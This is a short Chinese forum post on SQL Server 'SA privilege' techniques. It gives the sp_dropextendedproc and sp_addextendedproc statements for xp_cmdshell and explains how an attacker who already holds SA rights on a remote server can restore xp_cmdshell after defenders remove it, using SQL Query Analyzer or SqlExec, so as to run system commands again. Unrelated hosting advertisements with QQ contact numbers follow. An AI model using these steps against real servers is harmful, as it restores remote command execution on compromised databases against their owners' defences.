Microsoft SQL Server数据库SA权限总结
需要准备的工具:SQL Query Analyzer和SqlExec Sunx Version 第一部分: 去掉xp_cmdshell保护系统的具体分析:语句如下:1.去掉xp_cmdshell扩展过程的方法是使用如下语句:if exists (select * from dbo.sysobjects where id=object_id(N'.') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)exec sp_dropextendedproc N'.'2.添加xp_cmdshell扩展过程的方法是使用如下语句:sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'现在看看现象:我们在取得SA权限后远程用Sqlexec执行cmd命令,出现提示SQL_ERROR,那么很可能是去掉了xp_cmdshell。 现在来看看被去掉xp_cmdshell后恢复的两种方法: 方法一、使用SQL Query Analyzer连接对方后直接写入,挺方便sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'方法二、使用SqlExec Sunx Version首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc 'xp_cmdshell','xpsql70.dll'或者对Sql2000情况下使用sp_addextendedproc 'xp_cmdshell','xplog70.dll'另外使用SqlExec Sunx Version来去除xp_cmdshell的方法和加的时候选择条件一样,然后输入sp_dropextendedproc 'xp_cmdshell'就可以了。提供:香港服务器租用,托管,数据库,海外服务器,虚拟主机,VPS,独享10M宽带QQ:372815651◆联系QQ:372815651 兆恒伟业/idczy.comQQ:372815651佛山思海网络,十九年优质运营商,IPV6、IPV4、电信、联通、双线、BGP、高防服务器大优惠! 佛山思海网络欢迎您前来咨询!QQ8172148800001.cn
页:
[1]